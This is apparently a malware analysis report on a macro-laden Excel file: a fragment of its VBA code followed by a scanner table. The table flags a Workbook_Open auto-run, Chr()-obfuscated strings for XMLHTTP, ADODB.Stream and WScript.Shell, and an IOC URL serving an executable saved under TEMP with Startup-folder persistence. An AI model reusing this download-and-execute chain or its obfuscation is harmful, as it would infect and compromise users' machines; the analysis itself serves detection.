- strPCLangLocaliseName = GetUserLocaleInfo(LCID, LOCALE_SLANGUAGE)
- 'English name of language
- strPCLangEngName = GetUserLocaleInfo(LCID, LOCALE_SENGLANGUAGE)
- End Sub
- ' Saves a stream object's contents to a file. Despite the registry-style names, nothing here touches the registry.
- '   REGEXPANDSZ - the stream object (ntegerLongue passes its Adodb.Stream).
- '   EXPANDSZ1   - destination file path.
- Public Function REGMULTISZ1(REGEXPANDSZ As Object, EXPANDSZ1 As String)
- ' Local variable that reuses the name of the REG_EXPAND_SZ constant referenced in GetKeyValue; here it is just the integer 2.
- Dim REG_EXPAND_SZ As Integer
- REG_EXPAND_SZ = 2
- ' For an ADODB.Stream, save option 2 is adSaveCreateOverWrite: an existing file at the path is replaced.
- REGEXPANDSZ.savetofile EXPANDSZ1, REG_EXPAND_SZ
- End Function
- '!--------------------------------------------------------------------------------
- '! Procedure (Ooieoey) : Sub LocaliseMessage
- '! Description (Iienaiea) : [Eieaeecaoey niiauaiee i?ia?aiiu]
- '! Parameters (Ia?aiaiiua): StrPathFile (String)
- '!--------------------------------------------------------------------------------
- Public Sub LocaliseMessage(strPathFile As String)
- Dim i As Integer
- For i = 1 To UBound(strMessages)
- strMessages(i) = LocaliseString(strPathFile, "Messages", "strMessages" & i, "strMessages" & i)
- Next i
- End Sub
- '!--------------------------------------------------------------------------------
- '! Procedure (Ooieoey) : Function LocaliseString
- '! Description (Iienaiea) : [type_description_here]
- '! Parameters (Ia?aiaiiua): StrPathFile (String)
- ' strSection (String)
- ' strParam (String)
- ' strDefValue (String)
- '!--------------------------------------------------------------------------------
- Public Function LocaliseString(ByVal strPathFile As String, ByVal strSection As String, ByVal strParam As String, ByVal strDefValue As String) As String
- Dim strTemp As String
- strTemp = Trim$(IniSt.ringPrivate(strSection, strParam, strPathFile))
- If StrComp(strTemp, "no_key") <> 0 Then
- LocaliseString = Conve.rtString(strTemp)
- Else
- LocaliseString = strDefValue
- End If
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | Windows | May enumerate application windows (if |
- | | | combined with Shell.Application object) |
- | Suspicious | RegOpenKeyEx | May read or write registry keys |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | sample | May detect Anubis Sandbox |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Output | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Print # | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | http://alarmtechcent | URL (obfuscation: VBA expression) |
- | | ral.com/fw43t2d/98kj | |
- | | 6.exe | |
- | IOC | 98kj6.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- | VBA string | Ad(odb*.)Strea+m | (Chr(65) & Chr(100) + "(" & Chr(111) & |
- | | | Chr(100) & "b*" & Chr(46) & ")S" & |
- | | | Chr(116) & Chr(114) & Chr(101) & |
- | | | Chr(97) & "+m") |
- | VBA string | M++i(cr)o | Chr(77) & "++" + Chr(105) & "(cr)" & |
- | | | Chr(111) |
- | VBA string | oft.*XML*HTTP | Chr(100 + 11) & Chr(102) & "t" & |
- | | | Chr(46) & "*X" & Chr(77) & Chr(76) & |
- | | | "*H" & Chr(84) & "TP" |
- | VBA string | http://alarmtechcent | Chr(104) & "t" & "t" & Chr(112) & |
- | | ral.com/fw43t2d/98kj | Chr(58) & Chr(47) & Chr(47) & Chr(97) & |
- | | 6.exe | "l" & Chr(97) & Chr(114) & Chr(109) & |
- | | | Chr(116) & Chr(101) & Chr(99) & "h" & |
- | | | Chr(99) & Chr(101) & Chr(110) & "t" & |
- | | | "r" & "a" & Chr(108) & "." & Chr(99) & |
- | | | Chr(111) & Chr(109) & "/" & "f" & "w" & |
- | | | Chr(52) & "3" & "t" & "2" & Chr(100) & |
- | | | "/" & Chr(57) & "8" & Chr(107) & "j" & |
- | | | "6" & Chr(46) & Chr(101) & Chr(120) & |
- | | | "e" |
- | VBA string | USERNAME\Start Menu\ | ("USERNAME") & "\Start |
- | | Programs\Startup | Menu\Programs\Startup" |
- | VBA string | USERNAME\Start Menu\ | ("USERNAME") & "\Start |
- | | Programs\Startup\ | Menu\Programs\Startup\" |
- | VBA string | GET | Chr(71) & Chr(69) & "T" |
- | VBA string | She(l)+l+.A*pp(l)ica | ("Sh" & Chr(101) & "(l)" & "+l+" & |
- | | +ti()on | Chr(46) & Chr(65) & "*p" & Chr(112) & |
- | | | "(l)" & Chr(105) & Chr(99) & "a+t" + |
- | | | Chr(105) & "()" & Chr(111) + Chr(110)) |
- | VBA string | W(S+c)ri*pt.Shel))l | (Chr(87) & "(S+c)" & Chr(114) & |
- | | | Chr(105) & "*p" & Chr(116) & Chr(46) & |
- | | | Chr(83) & Chr(104) & Chr(101) & |
- | | | Chr(108) & "))l") |
- | VBA string | Process | (Chr(80) & "r" & Chr(111) & Chr(99) & |
- | | | Chr(101) & Chr(115) & Chr(115)) |
- | VBA string | TEMP\kah78d | (Chr(84) & "E" & Chr(77) & Chr(80)) + |
- | | | "\ka" & Chr(104) + "78d" |
- +------------+----------------------+-----------------------------------------+